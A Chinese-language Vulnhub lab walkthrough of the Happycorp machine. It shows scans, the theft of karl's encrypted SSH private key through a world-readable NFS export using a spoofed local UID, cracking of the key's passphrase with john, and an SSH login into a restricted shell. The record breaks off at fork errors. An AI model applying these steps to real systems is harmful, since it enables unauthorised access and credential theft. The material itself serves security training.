Vulnhub之Happycorp靶機測試過程
阿新 • • 發佈:2022-12-04
Happycorp
識別目標主機IP地址
─(kali㉿kali)-[~/Vulnhub/Happycorp] └─$ sudo netdiscover -i eth1 Currently scanning: 192.168.128.0/16 | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor 192.168.56.100 08:00:27:9a:9e:c2 1 60 PCS Systemtechnik GmbH 192.168.56.253 08:00:27:8f:f5:17 1 60 PCS Systemtechnik GmbH
利用Kali Linux自帶的netdiscover工具識別目標主機的IP地址為192.168.56.253
NMAP掃描
┌──(kali㉿kali)-[~/Vulnhub/Happycorp] └─$ sudo nmap -sS -sV -sC -p- 192.168.56.253 -oN nmap_full_scan Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-03 23:25 EST Nmap scan report for localhost (192.168.56.253) Host is up (0.000079s latency). Not shown: 65527 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 81:ea:90:61:be:0a:f2:8d:c3:4e:41:03:f0:07:8b:93 (RSA) | 256 f6:07:4a:7e:1d:d8:cf:a7:cc:fd:fb:b3:18:ce:b3:af (ECDSA) |_ 256 64:9a:52:7b:75:b7:92:0d:4b:78:71:26:65:37:6c:bd (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-robots.txt: 1 disallowed entry |_/admin.php |_http-title: Happycorp |_http-server-header: Apache/2.4.25 (Debian) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 3,4 2049/tcp nfs | 100003 3,4 2049/tcp6 nfs | 100003 3,4 2049/udp nfs | 100003 3,4 2049/udp6 nfs | 100005 1,2,3 37884/udp mountd | 100005 1,2,3 40573/udp6 mountd | 100005 1,2,3 41755/tcp6 mountd | 100005 1,2,3 55611/tcp mountd | 100021 1,3,4 33478/udp6 nlockmgr | 100021 1,3,4 38352/udp nlockmgr | 100021 1,3,4 44527/tcp nlockmgr | 100021 1,3,4 45537/tcp6 nlockmgr | 100227 3 2049/tcp nfs_acl | 100227 3 2049/tcp6 nfs_acl | 100227 3 2049/udp nfs_acl |_ 100227 3 2049/udp6 nfs_acl 2049/tcp open nfs_acl 3 (RPC #100227) 35799/tcp open mountd 1-3 (RPC #100005) 44527/tcp open nlockmgr 1-4 (RPC #100021) 54587/tcp open mountd 1-3 (RPC #100005) 55611/tcp open mountd 1-3 (RPC #100005) MAC Address: 08:00:27:8F:F5:17 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.02 seconds
獲得Shell
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ curl http://192.168.56.253/robots.txt
User-agent: *
Disallow: /admin.php
┌──(kali㉿kali)-[~/Vulnhub/Happycorp] └─$ curl http://192.168.56.253/admin.php <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css"> <center><br /> <h2>Happycorp Super Secure login</h2> <br /> <form method="POST" action=""> <label>Username:</label><input type="text" name="user" value=""><br /> <label>Password:</label><input type="password" name="pass" value=""><br /> <input type="submit" value="Login"> <!-- That computer thingy about db and such doesn't work so I just hard coded it - Rodney --> </form></div> </center>
訪問admin.php頁面,返回頁面的註釋中提示站點沒有用資料庫,同時可能使用者名稱為:Rodney
看一下是否可以暴力破解rodney的密碼:
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ nikto -h http://192.168.56.253
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.253
+ Target Hostname: 192.168.56.253
+ Target Port: 80
+ Start Time: 2022-12-03 23:34:31 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ Entry '/admin.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Server may leak inodes via ETags, header found with file /, inode: 8825, size: 58340bcff7e6c, mtime: gzip
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2022-12-03 23:35:19 (GMT-5) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
80埠暫時沒有什麼收穫,從NMAP掃描結果可以知道目標主機有NFS服務:
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ sudo showmount -e 192.168.56.253
Export list for 192.168.56.253:
/home/karl *
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ mkdir share
目標主機有共享目錄,因此將其掛載到本地:
┌──(kali㉿kali)-[~/Vulnhub/Happycorp/share]
└─$ ls -alh
total 28K
drwxr-xr-x 3 1001 1001 4.0K Mar 5 2019 .
drwxr-xr-x 3 kali kali 4.0K Dec 3 23:50 ..
lrwxrwxrwx 1 root root 9 Mar 5 2019 .bash_history -> /dev/null
-rw-r--r-- 1 1001 1001 220 Mar 4 2019 .bash_logout
-rw-r--r-- 1 1001 1001 3.5K Mar 5 2019 .bashrc
-rw------- 1 1001 1001 28 Mar 4 2019 .lesshst
-rw-r--r-- 1 1001 1001 675 Mar 4 2019 .profile
drwx------ 2 1001 1001 4.0K Mar 5 2019 .ssh
發現只有1001使用者和組才能訪問,因此在本地建立1001使用者,就可以讀取檔案,拷貝私鑰,並且從id_rsa.pub知道使用者名稱為karl
┌──(kali㉿kali)-[~/Vulnhub/Happycorp/share]
└─$ su 1001
Password:
┌──(kali㉿kali)-[~/Vulnhub/Happycorp/share]
└─$ sudo passwd 1001
New password:
Retype new password:
passwd: password updated successfully
┌──(kali㉿kali)-[~/Vulnhub/Happycorp/share]
└─$ su 1001
Password:
$ ls
$ cd /home/kali
$ ls -alh
total 26M
drwxr-xr-x 28 kali kali 4.0K Dec 3 23:40 .
drwxr-xr-x 3 root root 4.0K Aug 8 06:10 ..
drwxr-xr-x 9 kali kali 4.0K Nov 25 21:14 antSword-master
-rw-r--r-- 1 kali kali 26M Nov 25 21:13 antSword-master.zip
-rw------- 1 kali kali 204 Nov 25 06:26 .bash_history
-rw-r--r-- 1 kali kali 220 Aug 8 06:10 .bash_logout
-rw-r--r-- 1 kali kali 5.5K Aug 8 06:10 .bashrc
-rw-r--r-- 1 kali kali 3.5K Aug 8 06:10 .bashrc.original
drwx------ 4 kali kali 4.0K Nov 22 21:39 .BurpSuite
drwx------ 13 kali kali 4.0K Dec 1 20:12 .cache
drwxr-xr-x 16 kali kali 4.0K Nov 27 06:40 .config
drwxr-xr-x 2 kali kali 4.0K Nov 21 21:22 Desktop
-rw-r--r-- 1 kali kali 35 Nov 21 20:14 .dmrc
drwxr-xr-x 2 kali kali 4.0K Nov 21 20:14 Documents
drwxr-xr-x 2 kali kali 4.0K Dec 3 21:33 Downloads
-rw-r--r-- 1 kali kali 12K Aug 8 06:10 .face
lrwxrwxrwx 1 kali kali 5 Aug 8 06:10 .face.icon -> .face
-rw-r--r-- 1 kali kali 22 Nov 30 18:01 .gdbinit
drwx------ 3 kali kali 4.0K Nov 21 20:14 .gnupg
-rw------- 1 kali kali 0 Nov 21 20:14 .ICEauthority
-rwxr-xr-x 1 kali kali 2.0K Nov 24 02:58 ICMS
drwxr-xr-x 4 kali kali 4.0K Nov 22 04:47 .java
drwx------ 2 kali kali 4.0K Nov 30 12:48 .john
-rw------- 1 kali kali 20 Dec 2 23:04 .lesshst
drwx------ 5 kali kali 4.0K Dec 1 20:12 .local
drwx------ 5 kali kali 4.0K Nov 21 20:43 .mozilla
drwxr-xr-x 10 kali kali 4.0K Nov 26 03:46 .msf4
drwxr-xr-x 2 kali kali 4.0K Nov 21 20:14 Music
drwxr-xr-x 4 kali kali 4.0K Nov 30 18:00 peda
drwxr-xr-x 2 kali kali 4.0K Nov 21 20:14 Pictures
drwx------ 3 kali kali 4.0K Nov 25 21:13 .pki
-rw-r--r-- 1 kali kali 807 Aug 8 06:10 .profile
drwxr-xr-x 2 kali kali 4.0K Nov 21 20:14 Public
-rw------- 1 kali kali 1.4K Nov 22 21:21 .python_history
drwx------ 2 kali kali 4.0K Dec 3 09:39 .ssh
-rw-r--r-- 1 kali kali 0 Nov 21 20:24 .sudo_as_admin_successful
drwxr-xr-x 2 kali kali 4.0K Nov 21 20:14 Templates
drwxr-xr-x 5 kali kali 4.0K Nov 29 07:10 Toolsets
-rw-r----- 1 kali kali 4 Dec 3 23:18 .vboxclient-clipboard.pid
-rw-r----- 1 kali kali 4 Dec 3 23:18 .vboxclient-display-svga-x11.pid
-rw-r----- 1 kali kali 4 Dec 3 23:18 .vboxclient-draganddrop.pid
-rw-r----- 1 kali kali 4 Dec 3 23:18 .vboxclient-seamless.pid
drwxr-xr-x 2 kali kali 4.0K Nov 21 20:14 Videos
-rw------- 1 kali kali 17K Dec 3 08:45 .viminfo
drwxr-xr-x 48 kali kali 4.0K Dec 3 23:19 Vulnhub
drwxr-xr-x 2 kali kali 4.0K Nov 25 20:43 .weevely
-rw-r--r-- 1 kali kali 224 Nov 30 22:38 .wget-hsts
drwxr-xr-x 3 kali kali 4.0K Nov 25 10:18 .wpscan
-rw------- 1 kali kali 49 Dec 3 23:18 .Xauthority
-rw------- 1 kali kali 11K Dec 3 23:48 .xsession-errors
-rw------- 1 kali kali 8.1K Dec 3 23:04 .xsession-errors.old
drwxr-xr-x 21 kali kali 4.0K Nov 25 22:48 .ZAP
-rw------- 1 kali kali 76K Dec 3 23:04 .zsh_history
-rw-r--r-- 1 kali kali 11K Aug 8 06:10 .zshrc
$ cd Vulnhub
$ ls -alh
total 192K
drwxr-xr-x 48 kali kali 4.0K Dec 3 23:19 .
drwxr-xr-x 28 kali kali 4.0K Dec 3 23:40 ..
drwxr-xr-x 2 kali kali 4.0K Nov 30 20:05 42Challenge
drwxr-xr-x 2 kali kali 4.0K Dec 1 06:48 Aqua
drwxr-xr-x 2 kali kali 4.0K Nov 30 08:33 Backdoored
drwxr-xr-x 2 kali kali 4.0K Nov 30 22:38 Beezlebub
drwxr-xr-x 2 kali kali 4.0K Dec 1 08:55 bossplayersCTF
drwxr-xr-x 2 kali kali 4.0K Dec 2 08:15 Bottleneck
drwxr-xr-x 2 kali kali 4.0K Dec 1 03:31 Darkhole
drwxr-xr-x 7 kali kali 4.0K Dec 2 23:42 Darkhole2
drwxr-xr-x 2 kali kali 4.0K Dec 3 22:11 Dawn
drwxr-xr-x 2 kali kali 4.0K Dec 3 22:49 DC_1
drwxr-xr-x 2 kali kali 4.0K Dec 3 08:45 DC416_Galahad
drwxr-xr-x 2 kali kali 4.0K Dec 3 09:41 Dr4g0n_b4ll-disk1
drwxr-xr-x 2 kali kali 4.0K Nov 21 22:01 Gigachad
drwxr-xr-x 2 kali kali 4.0K Nov 22 00:19 Hackable_II
drwxr-xr-x 2 kali kali 4.0K Nov 22 02:57 Hackathon2
drwxr-xr-x 2 kali kali 4.0K Nov 22 04:48 Hacker_Kid
drwxr-xr-x 3 kali kali 4.0K Nov 23 05:49 Hacksudo3
drwxr-xr-x 2 kali kali 4.0K Nov 23 07:51 Hacksudo_Alien
drwxr-xr-x 3 kali kali 4.0K Nov 23 00:29 Hacksudo_FOG
drwxr-xr-x 2 kali kali 4.0K Nov 23 08:58 Hacksudo_LPE
drwxr-xr-x 2 kali kali 4.0K Nov 23 00:05 Hacksudo_ProximaCentaur
drwxr-xr-x 2 kali kali 4.0K Nov 23 03:40 Hacksudo_Search
drwxr-xr-x 3 kali kali 4.0K Dec 3 23:50 Happycorp
drwxr-xr-x 2 kali kali 4.0K Nov 24 04:48 ICMP
drwxr-xr-x 3 kali kali 4.0K Nov 24 08:43 Inferno
drwxr-xr-x 2 kali kali 4.0K Dec 1 04:44 InfoSecWarriorBox2
drwxr-xr-x 2 kali kali 4.0K Nov 25 02:32 Ino
drwxr-xr-x 2 kali kali 4.0K Nov 25 05:53 Insomnia
drwxr-xr-x 2 kali kali 4.0K Nov 25 21:51 jangow
drwxr-xr-x 3 kali kali 4.0K Nov 25 23:20 KB_Vuln
drwxr-xr-x 3 kali kali 4.0K Nov 26 03:01 KB_Vuln2
drwxr-xr-x 2 kali kali 4.0K Nov 26 06:57 KiraCTF
drwxr-xr-x 2 kali kali 4.0K Nov 26 10:05 Loly
drwxr-xr-x 2 kali kali 4.0K Nov 26 22:19 M87
drwxr-xr-x 3 kali kali 4.0K Nov 27 00:31 Mercury
drwxr-xr-x 2 kali kali 4.0K Nov 27 07:02 MoneyBox
drwxr-xr-x 2 kali kali 4.0K Nov 27 09:32 Monitoring
drwxr-xr-x 2 kali kali 4.0K Nov 27 21:20 Nully
drwxr-xr-x 2 kali kali 4.0K Nov 27 22:49 Odin
drwxr-xr-x 2 kali kali 4.0K Nov 28 01:21 Phineas
drwxr-xr-x 2 kali kali 4.0K Nov 28 03:07 potato-suncsr
drwxr-xr-x 2 kali kali 4.0K Nov 28 04:51 Praying
drwxr-xr-x 2 kali kali 4.0K Nov 28 06:40 Pwn_the_Tron
drwxr-xr-x 2 kali kali 4.0K Nov 28 09:47 Ragnar_lothbrok
drwxr-xr-x 2 kali kali 4.0K Nov 29 07:10 Shuriken_1
drwxr-xr-x 2 kali kali 4.0K Nov 29 09:22 Tender
$ cd Happycorp
$ ls -alh
total 16K
drwxr-xr-x 3 kali kali 4.0K Dec 3 23:50 .
drwxr-xr-x 48 kali kali 4.0K Dec 3 23:19 ..
-rw-r--r-- 1 root root 2.2K Dec 3 23:26 nmap_full_scan
drwxr-xr-x 3 1001 1001 4.0K Mar 5 2019 share
$ cd share
$ ls -alh
total 28K
drwxr-xr-x 3 1001 1001 4.0K Mar 5 2019 .
drwxr-xr-x 3 kali kali 4.0K Dec 3 23:50 ..
lrwxrwxrwx 1 root root 9 Mar 5 2019 .bash_history -> /dev/null
-rw-r--r-- 1 1001 1001 220 Mar 4 2019 .bash_logout
-rw-r--r-- 1 1001 1001 3.5K Mar 5 2019 .bashrc
-rw------- 1 1001 1001 28 Mar 4 2019 .lesshst
-rw-r--r-- 1 1001 1001 675 Mar 4 2019 .profile
drwx------ 2 1001 1001 4.0K Mar 5 2019 .ssh
$ cd .ssh
$ ls -alh
total 24K
drwx------ 2 1001 1001 4.0K Mar 5 2019 .
drwxr-xr-x 3 1001 1001 4.0K Mar 5 2019 ..
-rw-r--r-- 1 1001 1001 740 Mar 4 2019 authorized_keys
-rw------- 1 1001 1001 3.3K Mar 4 2019 id_rsa
-rw-r--r-- 1 1001 1001 740 Mar 4 2019 id_rsa.pub
-rw-r--r-- 1 1001 1001 18 Mar 4 2019 user.txt
$ cat user.txt
flag1{Z29vZGJveQ}
$ chmod 400 id_rsa
chmod: changing permissions of 'id_rsa': Read-only file system
$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,A6E2D064459881EDB840A03CF87FC98C
E7bMz/o+2TKdht+lrSWgyrz+4ZpjiKVJqJP4Jc+1U/FEeh+ebdRxCmPffncCDbBk
Mt/fV+R5i74rAlF+I+oKQkaMEgiODJ/kkBgeNqxtXp/xw64v77CzlwYiInuXQRwD
Gqz5MZbO0+iTRF5r6hULEVMjrH7u1OUHM23AXZPCVWKpIDwKyggMO/XTOWt4eY2W
eQXBm77dwBd9Jp1z2ao5aZDujs5jRe2iSD2EbrUS0odR4yfLCHAy+VPtAbww30ni
QErM4l3Nv8gKfJRZ1SoPi8SSuzSaWyNbS7+jLaSoY6l/Pz5biX61QwUeEJzSGfmm
1xxQObwiOD8nMbu85uP+f24Hpsqnclc3aKhQyxZ7liWokElTocWXB66y1D3LFsN5
sifI6vCDge7tkwbWRLsbL+fUg61/bPaE1mD8sTSlx6vxA9oPmtsjzWWa4KGNvh3U
6JHakEu1K7G38ugMlThjby8BC8BEDMA2Fd/Ki9a6rpMucZV9fRf8QFgsqMhUfplm
+fDSszDdgHdZufEo634WdEsoHLBfAEtxskhmgL+SfsgddtBmbIA9ZzrKnVf6edVI
WqBYtoOy0xg37yppMv3k0VwNMbKSRT3gT8BILpl0oKnC2bBddXz7EtYycI2gjGnB
jLlgnFvvQk6XPXm4+rNv1wGzQ8vFCQ/VnjRj1/eay2iA2Omg/qxTxi0SXrG3DZvJ
ZO0M/HRB3M0Pma3Q9pTztBINrgeGp+iDs+IZzUa+jvRzX2pTAWte/j4+m3/C8C3Q
O1m3Wb9qax9Lk4zTW6+HREcy9uRisLiWjaW3zO49+NRIDvHKYWNOiORBQ03q01af
4RUDVJLtJT+ghL23caLOhPAfkMCxdud35ylWkEt29Aq53s/D/0O2JsBEMlXDm48+
UK9w8AS2jk2Z2h1A8RGueANlU4ngCS4bTP4oOqwXZZvw+0ryFlBWYihAHP5180lr
Ly2qzDFLgRiF037vALQN9eIBTkl8kN/HOs/Qwmu03qD3l44i+ilwYyQGe4rWH29i
mLGHXk9cmojX+O9BZ+mrfVyu4iWafPYjZaL2uyzo9DKWV8tucE20SJvF7iS0CK50
1tz/fefe1r1HBeP/DyxWuOl/klZExkYq3kzPi1h+M8OqRzQmfFx1KHeoH47Va9Mi
X9+fgqwuophcUaVjznKi3RUSySQlBYt6Z0f1sns8/fYVw0+uNDmrdZf7AQ1AtojE
4pycRxAGLlGNV+dVA7SvTPo4+Fd8u70Jmqona0A/xVfdS7t9U/vNhfGnSvl+vS3g
OD929wiO3mqsJnzmTG07eax7OvqRPc+z+5ALKziE++7ClwAJli30Nit1CdxwISEn
7NBGAIbRxQ7iu4tKXycVzIfRGKEEoAM1LqyHN9bDcicuUZHx6RlpCLJnIjAeEYQ7
3zcOSs/O4+ttYJ+1ADHzhr2aj9BsEcWZjV1s0EoWXGaLjfQpWG5M9sW2u5wd+Ch0
XnLEV/8WmzAZPC6yz6MiFVIzJc1tP0shT6fAH4d+TOYakBkraFWobgmIe1NLHAbY
GGhahKsiAw9fb5U/Bu2No715B99dDs/bcAkv+u8A3rf/kCDLyATL7I3VxCW21OCx
XiKkjTLgEOx6t0KIQHxZPHKgi8PgDhXr6tTLQ1Cxq8T/Gg7yx4UBFheVswJE2tGy
8CufKKg+ATCp20Zjr/B6voXcbI+gCDZ0AvEdDHgfXggkVtovCbmaCPXsYlP1GJpG
nss+me1pHXrP5Q23shjdvAEyCWTNOQ1yXrWgQxAETd5R7skBfpgBuGhgp1hNHTIm
qqa7iAQ6cBgs21Nl2D65k3e5QXQcc5ylLyYsbmfuhC2RzSlxyr7jJ6ngDGOuGxXy
FMFNomm5PJq4Nxoem8F9w9EU/gh1xIh+cjS/EGihnWv8shmg2cFoq1AtZqO4ow9G
53wHL/9opkEnrP2z3mklJmnuBcUDyZ35geymWKZ8xf+EItG5Lm+YFlYT/USD4Q63
e4gVMnxJODanxc/Vvj8t9U69DrH08q6jxVLT5rGdWTC7DmR/TEmaRco1okUNIJHd
oyI9TYT4AwIHAXs4ON2IxU6uUvJN5cgVgoc4zlTalUz7Tk3apjyavDECcvhapumb
ie0y0JOJk5nHiw8y/73oB/XEnr4roCADoYO8XvcMueGnCIRlhc4Q2SEwU0J2ghbx
xlXx0h1V6tnuFaj6Zzdbi+QAqc+g84mgoiZmVK3ln73BLgBXy9elNXYrgpgw65L9
XZzrBSd74ViT1b/vidFrZewzhjY3wuccyFbbo5109JMJPisGhWaLWZRk8NcRfq2Y
Q/eSngFOXwXfJWcK+dQGr1/xXANAa1iN+7VLrfNEMC8f5cgqxyGg2h109jfJ6/BC
Vd6U6v4a7o662foKQWyhrDpkV6m2wCXBuAKY34FMBROmdpDdSLeiIYyPuDeUjbny
SaiJDUoJMjz3wzgzsDuDa1EMzUjCqNc5MO5jfyORk3GClrhU569u5MLnmQ/dAKny
ffR4RqNNtdeQw0tDzKq0BAahEHnoJZJPpb1+TSIx5QMK//M7rZlSxigGP840j0a1
YZI4f0tX4CZ9pEJZKr4q0G7JBC5bsZKRBpYa/Ey/eClK+4moTwS5AUJw7uifccxd
TlCHat9j7qrkUdsH3lHGxp8tERpDVV4AyM2Tuq0QCkFT6hTfnLhB3znBz+NCfpsR
vL60rsg33ZtId1RgQ4d7vcsDGaZMYUHfuiqhgjY9K/f7VQ0mRK+t27ww9UWAyAtG
3I5E5Bt4HhhpArkzkJmgx3vySnrtBbNN0WVN63eCsGOc3UNQpRGJgNcT486jjZW2
UByduAIZAkeySz8kqgqZ0SbVv+nrzXxCRKQFaNN5M1t+3NjBPJ3Qcc8ngIhmaPyF
BuWD4SIUcPkkt1iwROzuInaiFR4GAejePeXLL7XAJ7i0yVbOiBmwPRRk0mvhyI/1
Ewb1zJw+8huXZGWOQmWznrCyR7H5CTR9+a8HYW5Nr5j0Y3sNEmC5L2gicxm/gyDi
Viz09SdNxqZAMdMtmOu6jYmJ3G8eh/RYKhk3dgpFgqBtNzLx6NW2b7NVjwYodvFG
L+UmdHyHHWbXSY8KdfDhBJ1RIDcugUWwyR4RncuIzQxegHILl1fHxTUtNqYtICbM
-----END RSA PRIVATE KEY-----
$ ls
authorized_keys id_rsa id_rsa.pub user.txt
$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDNiAQUpuxbe7Urm0OHSwVJqx0xSTApeX+e6YcNE1Yv0EWPQsDu3d737H0dIhG/l3ftjGbFLshiXkQkdPun96Y0V6CXm7YtAOI2ga1M83ApRDzFsCvSteXBECZHHhACB7gjdidrW6aohTlqZCcEkyEOEb2Mt8nHTA+dfmaRwqJl1nMzO5l4cTg/rN3TiMwAa+lyjjjxJ0v2tvRde+VOafunF+/vYrafhtgg3ECMxp9SSnD4NxU0fhX9eYdTcZkFb17Py5Bi8aZ4dWkuUrSIAIBXyF5voHIrZcOywmdauHhwbIWagqblvHtTjpoqzunRH6nicSZGEFsilQ943HOPSigyi6bKx+vK9aj+o4JsnMX3qyz1F0M7Nrzdc4rF1PZ2ViIl7PnhmwIFOpjRRcu/N+WB93gU9d4A6S/s2z+mkIghTme24IqPylZD9Rpol08je+KLXvtSg/Ypojruz6/zSl2FYVd9i53Sm3afp9P1OHQWllCVLv+xxiCI/c2r/bK9lE15vhzaSvaRrXchOX0Hnt0oiBXsIC/TMFzNwsy8RMzLpaxoHIK76CN8fPVulX+VmD7xqx6hQqS9fPsJTKikJjLz5laqLHbhHpaChSl/5PHZuafI3Li2QjUEt+RvyBAVUuGzRT8dwGOLDBB2+FK4Slu65AGkDfkDm9C1/9K8dGVm7Q== karl@happycorp
$
──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ >....
XiKkjTLgEOx6t0KIQHxZPHKgi8PgDhXr6tTLQ1Cxq8T/Gg7yx4UBFheVswJE2tGy
8CufKKg+ATCp20Zjr/B6voXcbI+gCDZ0AvEdDHgfXggkVtovCbmaCPXsYlP1GJpG
nss+me1pHXrP5Q23shjdvAEyCWTNOQ1yXrWgQxAETd5R7skBfpgBuGhgp1hNHTIm
qqa7iAQ6cBgs21Nl2D65k3e5QXQcc5ylLyYsbmfuhC2RzSlxyr7jJ6ngDGOuGxXy
FMFNomm5PJq4Nxoem8F9w9EU/gh1xIh+cjS/EGihnWv8shmg2cFoq1AtZqO4ow9G
53wHL/9opkEnrP2z3mklJmnuBcUDyZ35geymWKZ8xf+EItG5Lm+YFlYT/USD4Q63
e4gVMnxJODanxc/Vvj8t9U69DrH08q6jxVLT5rGdWTC7DmR/TEmaRco1okUNIJHd
oyI9TYT4AwIHAXs4ON2IxU6uUvJN5cgVgoc4zlTalUz7Tk3apjyavDECcvhapumb
ie0y0JOJk5nHiw8y/73oB/XEnr4roCADoYO8XvcMueGnCIRlhc4Q2SEwU0J2ghbx
xlXx0h1V6tnuFaj6Zzdbi+QAqc+g84mgoiZmVK3ln73BLgBXy9elNXYrgpgw65L9
XZzrBSd74ViT1b/vidFrZewzhjY3wuccyFbbo5109JMJPisGhWaLWZRk8NcRfq2Y
Q/eSngFOXwXfJWcK+dQGr1/xXANAa1iN+7VLrfNEMC8f5cgqxyGg2h109jfJ6/BC
Vd6U6v4a7o662foKQWyhrDpkV6m2wCXBuAKY34FMBROmdpDdSLeiIYyPuDeUjbny
SaiJDUoJMjz3wzgzsDuDa1EMzUjCqNc5MO5jfyORk3GClrhU569u5MLnmQ/dAKny
ffR4RqNNtdeQw0tDzKq0BAahEHnoJZJPpb1+TSIx5QMK//M7rZlSxigGP840j0a1
YZI4f0tX4CZ9pEJZKr4q0G7JBC5bsZKRBpYa/Ey/eClK+4moTwS5AUJw7uifccxd
TlCHat9j7qrkUdsH3lHGxp8tERpDVV4AyM2Tuq0QCkFT6hTfnLhB3znBz+NCfpsR
vL60rsg33ZtId1RgQ4d7vcsDGaZMYUHfuiqhgjY9K/f7VQ0mRK+t27ww9UWAyAtG
3I5E5Bt4HhhpArkzkJmgx3vySnrtBbNN0WVN63eCsGOc3UNQpRGJgNcT486jjZW2
UByduAIZAkeySz8kqgqZ0SbVv+nrzXxCRKQFaNN5M1t+3NjBPJ3Qcc8ngIhmaPyF
BuWD4SIUcPkkt1iwROzuInaiFR4GAejePeXLL7XAJ7i0yVbOiBmwPRRk0mvhyI/1
Ewb1zJw+8huXZGWOQmWznrCyR7H5CTR9+a8HYW5Nr5j0Y3sNEmC5L2gicxm/gyDi
Viz09SdNxqZAMdMtmOu6jYmJ3G8eh/RYKhk3dgpFgqBtNzLx6NW2b7NVjwYodvFG
L+UmdHyHHWbXSY8KdfDhBJ1RIDcugUWwyR4RncuIzQxegHILl1fHxTUtNqYtICbM
-----END RSA PRIVATE KEY-----' > id_rsa
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ ls
id_rsa nmap_full_scan share
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ chmod 400 id_rsa
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ ssh -i id_rsa [email protected]
The authenticity of host '192.168.56.253 (192.168.56.253)' can't be established.
ED25519 key fingerprint is SHA256:OgzwYRlM7h5bXbWancj8dQk7eP1k25uSijalWsnKWVQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.253' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
發現私鑰被口令保護:
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ ssh2john id_rsa > hashes
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ ls
hashes id_rsa nmap_full_scan share
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sheep (id_rsa)
1g 0:00:00:00 DONE (2022-12-04 00:02) 33.33g/s 538666p/s 538666c/s 538666C/s sweetstuff..raymon
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
破解私鑰的口令為sheep
發現雖然可以成功登入目標,但是提示resource temporarily unavailable
發現可以成功登入:
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 5 05:10:07 2019 from 192.168.207.129
rbash: warning: shell level (1000) too high, resetting to 1
id
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: Resource temporarily unavailable
karl@happycorp:~$ id
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: Resource temporarily unavailable
karl@happycorp:~$ id
